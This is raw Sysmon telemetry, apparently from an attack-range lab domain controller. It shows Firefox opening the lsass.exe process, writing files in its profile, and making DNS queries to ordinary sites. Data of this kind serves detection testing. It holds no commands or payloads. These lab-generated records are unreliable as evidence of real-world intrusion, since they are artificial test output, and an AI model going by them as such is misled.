10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=FBED2B256BABEA42227D514DDACFF917,SHA256=571F8993EAEF4D848F64F7C0085AE0A9FE0FCE59F6215F0DED2BE32456071BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=FC9296D30832AC5D9CE4BDFD49F33864,SHA256=B79C637565EC07CD30F297A273B0B1C02335B8A922E015623B27DF55B6A9FF16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=21ADDBC3699E68F09DC71F9955AA9049,SHA256=B9225FD083E566527FE27E73685BF0DF9D11B7D313083B0BCE74C3CF8DFC983A,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000288034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.5.164223806C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=65B766709090FA524C6E46B9A25D4080,SHA256=32B94934AC889DDFEB620B8B606D00E270626D3100482CCB30561822988CF8EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.082{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=9F96D5B2E1245691301D5A81E6A1172D,SHA256=884FF83310C994987D3FF1967BF26EB6693F963953B71EB3EE04E3558BB3DBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.080{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=07291423D1F99878D5EEE217E3373EDC,SHA256=115A55F7B1CA758360245D6920C1A75D34CDEAAE71D02166C8DE0C17F3DD7986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.079{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=ABE19CD8805E4562E2E8EE9371828AB1,SHA256=10186DAB3620504F4E4A277978FF34D0D7EEDCD15C337B3F290579CBFE31CC99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.076{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=4535FB0C1588BA8761D860BCFA3AE54B,SHA256=F8DF014638AF49DCF5181EEC9F7B4FF448CA725C25B592C4D2BAC109967A2472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=4DDC11A1B4C16C3057CE27E4382EC0BF,SHA256=A61562A97A8AB3F8DB200C8F916D0D2B3245C3F28388E91B4087B103AA23A32B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=D4EF0E03E04C319C86E946ABBDE157D8,SHA256=60C3526146CDE99151160D89D3722687FB3ED14C366F280769D72FD322666628,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3B6BF0DDA89507FE2AEF0BB78FEF3CB6,SHA256=45F37BC9B70802E85F12988A17850955AF5111052698D3618402B7ADF85FCDA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=F02158C74FC6B5C3447D6E686CF3FD90,SHA256=9599E1FBEB70AC641F170284754A452C134BEA4E6328DCA49C124D4B7637C1A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3150D4CD009F9327D4261FF4BEEBCB3B,SHA256=B962D58BA5254A1285B31B1DC69289910CCA73967A4DAB8599BF03E99768B6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.061{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=9F9F47149F07EBDECC4E93F1850B194D,SHA256=A77841E1276EA9EF9D41547AE4014FC312719DCC948CC8DBC8C1D18B9A3D1538,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.089{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51807- 354300x8000000000000000288299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.919{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58057- 354300x8000000000000000288298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.898{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58057- 354300x8000000000000000288297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.898{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55222- 23542300x8000000000000000288296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42E128F2C23FB5142BD71CEB3D2F8916,SHA256=0A07349ED3CC55AD05D23E809237A7B1107962548D6BC68D325F1B8CB1C62F4E,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.057{C8EA50B7-11AA-6216-1605-000000003802}2228gyan.nfshost.com02607:ff18:80::3b8e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.911{C8EA50B7-11AA-6216-1605-000000003802}2228gyan.nfshost.com0208.94.117.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.911{C8EA50B7-11AA-6216-1605-000000003802}2228www.gyan.dev0type: 5 gyan.nfshost.com;::ffff:208.94.117.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.823{C8EA50B7-11AA-6216-1605-000000003802}2228e15317.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.823{C8EA50B7-11AA-6216-1605-000000003802}2228e11847.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.822{C8EA50B7-11AA-6216-1605-000000003802}2228e15317.a.akamaiedge.net0104.75.90.58;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.822{C8EA50B7-11AA-6216-1605-000000003802}2228e11847.a.akamaiedge.net0104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.821{C8EA50B7-11AA-6216-1605-000000003802}2228www.ebay.de0type: 5 ipv4.slot11847.ebay.com.edgekey.net;type: 5 e11847.a.akamaiedge.net;::ffff:104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.821{C8EA50B7-11AA-6216-1605-000000003802}2228www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 www.amazon.de.edgekey.net;type: 5 e15317.a.akamaiedge.net;::ffff:104.75.90.58;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.818{C8EA50B7-11AA-6216-1605-000000003802}2228star-mini.c10r.facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.818{C8EA50B7-11AA-6216-1605-000000003802}2228git.ffmpeg.org9501-C:\Program Files\Mozilla Firefox\firefox.exe 